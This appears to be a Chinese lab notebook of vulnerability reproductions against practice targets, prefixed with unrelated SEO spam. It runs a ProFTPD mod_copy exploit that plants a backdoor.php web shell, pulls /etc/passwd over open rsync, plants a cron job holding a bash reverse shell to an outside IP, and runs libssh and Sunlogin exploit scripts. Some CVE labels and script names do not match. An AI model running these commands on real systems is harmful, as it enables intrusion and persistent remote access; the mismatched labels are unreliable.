怎么用360做网站跳转,第三方微信网站建设,网站建设分哪些类别,佛山专业网站建设公司哪家好Cve-2015-3306 背景#xff1a;
ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。
任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行#xff0c;…Cve-2015-3306 背景
ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。
任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行默认情况下该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdline将PHP有效负载复制到网站目录可以实现PHP远程代码执行。 python exploit.py --host 123.58.224.8 --port 52483 --path /var/www/html/ 123.58.224.8:52483 port从21映射到了52483 网页80端口映射到了
http://123.58.224.8:24391/backdoor.php?cmdid
利用exp来实现任意命令执行
二.配置不当-未授权访问-Rsync 文件备份
rsync 是 Linux 下一款数据备份工具支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口如果目标开启了 rsync 服务并且没有配 置 ACL 或访问密码我们将可以读写目标服务器文件。
下面是靶机的873反弹到21351端口正常的话看默认873端口就ok
rsync rsync://123.58.224.8:21351/ 读取文件 rsync rsync://123.58.224.8:21351/src 下载文件 rsync rsync://123.58.224.8:21351/src/etc/passwd ./ 将passwd下载到当前目录 上传文件 rsync -av passwd rsync://123.58.224.8:21351/src/tmp/passwd 将当前目录的passwd上传到目标靶机tmp目录下 rsync rsync://123.58.224.8:21351/src/tmp/passwd 读取任务计划 rsync rsync://123.58.224.8:21351/src/etc/crontab ./ 创建文件
touch 1 vim 1 /bin/bash -i /dev/tcp/192.168.83.156/5566 01 chmod x 1 rsync -av 1 rsync://123.58.224.8:21351/src/etc/cron.hourly rsync -av 1 rsync://123.58.224.8:21351/src/etc/cron.hourly 关闭靶场 sudo docker-compose down 运行此靶场 sudo docker-compose up -d 查看启动环境 sudo docker ps libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现
一、漏洞描述
libssh 是一个提供 SSH 相关接口的开源库包含服务端、客户端等。其服务端代码中存在一处逻辑错误攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息绕过认证过程未授权访问目标 SSH 服务器。
二、漏洞影响
libssh 0.6 及更高版本具有身份验证绕过漏洞。
libssh 版本 0.8.4 和 libssh 0.7.6 已发布以解决此问题 python3 libssh.py 192.168.83.136 2222 whoami 向日葵 CVE-2022-10270 远程代码执行漏洞 简介向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。 影响版本 向日葵个人版windows 11.0.0.33 向日葵简约版 v1.0.1.43315 连接上了但是无回显
python3 cve-2022-23131.py http://20.16.77.158 Admin